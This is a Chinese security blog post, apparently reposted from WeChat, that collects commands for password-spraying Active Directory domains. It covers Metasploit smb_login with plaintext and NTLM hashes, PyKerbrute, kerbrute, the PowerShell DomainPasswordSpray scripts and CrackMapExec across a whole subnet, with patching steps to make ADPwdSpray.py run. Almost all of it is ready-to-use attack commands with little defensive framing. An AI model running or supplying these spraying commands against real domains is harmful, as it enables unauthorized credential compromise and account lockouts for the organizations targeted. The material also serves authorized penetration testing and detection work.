域密码喷射工具集分享

admin 2024年4月24日06:42:41评论6 views字数 2262阅读7分32秒阅读模式

域密码喷射工具集分享

月光还是少年的月光,九州一色还是李白的霜。
                                            --余光中

先是MSF的,设置大体如下:

use auxiliary/scanner/smb/smb_loginset rhosts 192.168.183.128set USER_FILE /../../set SMBDomain enginge.com

域密码喷射工具集分享

执行效果如下

域密码喷射工具集分享

对于hash值,msf可以使用smb_login模块进行喷射,将smbpass的值设置为对应的LM : NTLM
aad3b435b51404eeaad3b435b51404ee:d787e3fddeee1d2dce38ed5d7d6b7226

域密码喷射工具集分享

执行效果如下

域密码喷射工具集分享

PyKerbrute工具,其有两个脚本组成,EnumADUser.py使用 Kerberos 预身份验证枚举有效的 Active Directory 帐户。简单食用方法
EnumADUser.py 192.168.1.1 test.com user.txt tcp
ADPwdSpray.py添加了对 TCP 和 Active Directory 帐户的 NTLM 哈希的支持。使用 Kerberos 预身份验证针对 Active Directory 帐户列表测试单个密码或 NTLM 哈希。简单食用方法
ADPwdSpray.py 192.168.1.1 test.com user.txt clearpassword DomainUser123! tcpADPwdSpray.py 192.168.1.1 test.com user.txt ntlmhash e00045bd566a1b74386f5c1e3612921b udp

但是其脚本存在一些问题

域密码喷射工具集分享

ADPwdSpray.py工具有问题解决方案:

其使用python2编写,所以
python2 -m pip install Crypto -i https://pypi.tuna.tsinghua.edu.cn/simplepython2 -m pip install pycryptodome -i https://pypi.tuna.tsinghua.edu.cn/simple
安装好后,windows修改crypto文件名为Crypto,linx不需要
路径分别为:
windows的:python2Libsite-packagesCryptoCipherlinux的:/usr/local/lib/python2.7/dist-packages/Crypto/Cipher/
接着将ADPwdSpray.py的缩进改正确。最后一步,将下面截图里的文件_crypto中的md4和md5复制到Cipher下
域密码喷射工具集分享

执行成功

域密码喷射工具集分享

kerbrute工具

kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123

域密码喷射工具集分享

Homework-of-Powershell工具,修改powershell策略可以加载脚本
Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUserImport-Module .Invoke-DomainPasswordSprayOutsideTheDomain.ps1Invoke-DomainPasswordSprayOutsideTheDomain -Password P@ass123
DomainPasswordSpray工具,简单食用方法
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txtInvoke-DomainPasswordSpray -Userlist users.txt -Domain enginge.com -password 123456

域密码喷射工具集分享

CrackMapExec工具,加上--continue-on-success,成功即止
CrackMapExec smb 192.168.1.1/24 -u 'administrator' -p 'password' --continue-on-successCrackMapExec smb 192.168.1.1/24 -u /../../user.txt -p /../../pass.txt --continue-on-successcrackmapexec smb 192.168.1.1/24 -u testuser -H de26cce0356891a4a020e7c4957afc72 -d enginge.com
域密码喷射工具集分享

域密码喷射工具集

https://github.com/3gstudent/Homework-of-Powershell/blob/master/Invoke-DomainPasswordSprayOutsideTheDomain.ps1
https://github.com/dafthack/DomainPasswordSpray/
https://github.com/byt3bl33d3r/CrackMapExec
https://github.com/ropnop/kerbrute
https://github.com/3gstudent/pyKerbrute

原文始发于微信公众号(Enginge):域密码喷射工具集分享

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月24日06:42:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   域密码喷射工具集分享https://cn-sec.com/archives/2083782.html

发表评论

匿名网友 填写信息